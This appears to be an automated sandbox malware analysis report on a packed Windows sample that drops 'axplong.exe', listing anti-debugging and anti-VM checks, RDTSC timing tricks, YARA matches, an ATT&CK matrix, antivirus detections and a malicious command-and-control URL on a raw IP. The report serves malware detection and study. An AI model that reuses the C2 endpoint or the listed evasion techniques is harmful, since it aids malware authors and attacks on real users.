                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D09 second address: 5040D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1B74BBC1D7h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D39 second address: 5040D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B751F19E4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D51 second address: 5040D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D69 second address: 5040D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 45C4E834h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D73 second address: 5040D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B74BBC1D9h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050BD2 second address: 5050BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050BD8 second address: 5050BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050BDC second address: 5050BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0A61 second address: 50C0A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0A65 second address: 50C0A80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0A80 second address: 50C0AA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0AA4 second address: 50C0AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0AA8 second address: 50C0AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0DBE second address: 50B0E03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1B751F19E7h 0x00000009 jmp 00007F1B751F19E3h 0x0000000e popfd 0x0000000f mov ch, 52h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1B751F19DEh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0E03 second address: 50B0E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0E09 second address: 50B0E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050EDD second address: 5050EFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1B74BBC1D1h 0x00000008 pop ecx 0x00000009 mov cx, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050EFF second address: 5050F05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050F05 second address: 5050F0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050F0B second address: 5050F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1B751F19DEh 0x00000015 xor ecx, 5124E358h 0x0000001b jmp 00007F1B751F19DBh 0x00000020 popfd 0x00000021 mov dl, cl 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov cl, bh 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050F56 second address: 5050FA4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1B74BBC1D8h 0x00000008 adc esi, 25BB34E8h 0x0000000e jmp 00007F1B74BBC1CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a popad 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1B74BBC1D7h 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050FA4 second address: 5050FAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C01DE second address: 50C0264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1B74BBC1CCh 0x00000011 add ax, 52F8h 0x00000016 jmp 00007F1B74BBC1CBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F1B74BBC1D8h 0x00000022 or ax, AD58h 0x00000027 jmp 00007F1B74BBC1CBh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 jmp 00007F1B74BBC1D6h 0x00000035 push dword ptr [ebp+0Ch] 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov cx, di 0x0000003e popad 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0264 second address: 50C0283 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0283 second address: 50C0287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0287 second address: 50C028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C02DC second address: 50C02E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C02E2 second address: 50C0314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c jmp 00007F1B751F19E0h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0314 second address: 50C0318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0318 second address: 50C031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507034E second address: 5070352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070352 second address: 5070356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070356 second address: 507035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507035C second address: 50703BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 mov esi, 0CF14E8Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1B751F19DCh 0x00000015 or ah, FFFFFF98h 0x00000018 jmp 00007F1B751F19DBh 0x0000001d popfd 0x0000001e mov dl, ah 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 movzx esi, di 0x00000026 pushfd 0x00000027 jmp 00007F1B751F19DDh 0x0000002c sbb ecx, 101F2436h 0x00000032 jmp 00007F1B751F19E1h 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703BD second address: 50703C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703C1 second address: 50703C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703C5 second address: 50703CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703CB second address: 50703D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703D1 second address: 50703D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703D5 second address: 50703FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F1B751F19E8h 0x0000000f push FFFFFFFEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703FF second address: 5070403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070403 second address: 5070420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070420 second address: 507047A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c call 00007F1B74BBC1C9h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F1B74BBC1CBh 0x00000018 sbb ecx, 508EBCDEh 0x0000001e jmp 00007F1B74BBC1D9h 0x00000023 popfd 0x00000024 mov ah, 4Bh 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007F1B74BBC1CAh 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507047A second address: 507047E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507047E second address: 5070484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070484 second address: 507048E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 51AAAC08h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507048E second address: 50704D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F1B74BBC1CCh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007F1B74BBC1CBh 0x00000017 pop eax 0x00000018 jmp 00007F1B74BBC1D6h 0x0000001d push 3781417Bh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50704D3 second address: 50704D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50704D8 second address: 5070526 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 40B9EF7Bh 0x00000010 jmp 00007F1B74BBC1D0h 0x00000015 mov eax, dword ptr fs:[00000000h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1B74BBC1D7h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A54A65 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 88EB1D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 904A65 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 73EB1D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\Desktop\file.exe Code function: 1_2_050C01A1 rdtsc 1_2_050C01A1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 421
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 2037
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1904
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5332 Thread sleep count: 52 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5332 Thread sleep time: -104052s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5348 Thread sleep count: 54 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5348 Thread sleep time: -108054s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3872 Thread sleep count: 421 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3872 Thread sleep time: -12630000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5476 Thread sleep count: 57 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5476 Thread sleep time: -114057s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6404 Thread sleep time: -360000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3360 Thread sleep count: 2037 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3360 Thread sleep time: -4076037s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4972 Thread sleep count: 1904 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4972 Thread sleep time: -3809904s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
                    Source: axplong.exe, axplong.exe, 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: file.exe, 00000001.00000003.2210243151.000000000133C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001109000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000008.00000002.3426692930.00000000010CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: file.exe, 00000001.00000002.2236169824.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2262480640.00000000008BD000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2272495754.00000000008BD000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 8_2_04FD0D0E Start: 04FD0DFF End: 04FD0D22 8_2_04FD0D0E
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\file.exe Code function: 1_2_050C01A1 rdtsc 1_2_050C01A1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 8_2_0070645B mov eax, dword ptr fs:[00000030h] 8_2_0070645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 8_2_0070A1C2 mov eax, dword ptr fs:[00000030h] 8_2_0070A1C2
                    Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: axplong.exe, axplong.exe, 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: cProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 8_2_006ED312 cpuid 8_2_006ED312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 8_2_006ECB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 8_2_006ECB1A

                    Stealing of Sensitive Information

                    Source: Yara match File source: 8.2.axplong.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.axplong.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.file.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 2.2.axplong.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000003.00000002.2272371089.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000003.2231966463.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000003.2221928235.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000003.2759333528.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.2236057072.0000000000821000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000002.2262405635.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000003.2195484295.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | LSASS Memory | 741 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 12 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 251 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 224 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Source | Detection | Scanner | Label
                    file.exe | 50% | ReversingLabs | Win32.Packed.Themida
                    file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                    file.exe | 100% | Joe Sandbox ML |

                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Avira | TR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Joe Sandbox ML |
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 50% | ReversingLabs | Win32.Packed.Themida
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 53% | Virustotal |
                    No Antivirus matches
                    No Antivirus matches
                    No contacted domains info
                    Name | Malicious | Antivirus Detection | Reputation
                    http://185.215.113.16/Jo89Ku7d/index.php | true | Avira URL Cloud: phishing | unknown
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    185.215.113.16 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1519970
                    Start date and time:2024-09-27 03:05:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 42s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
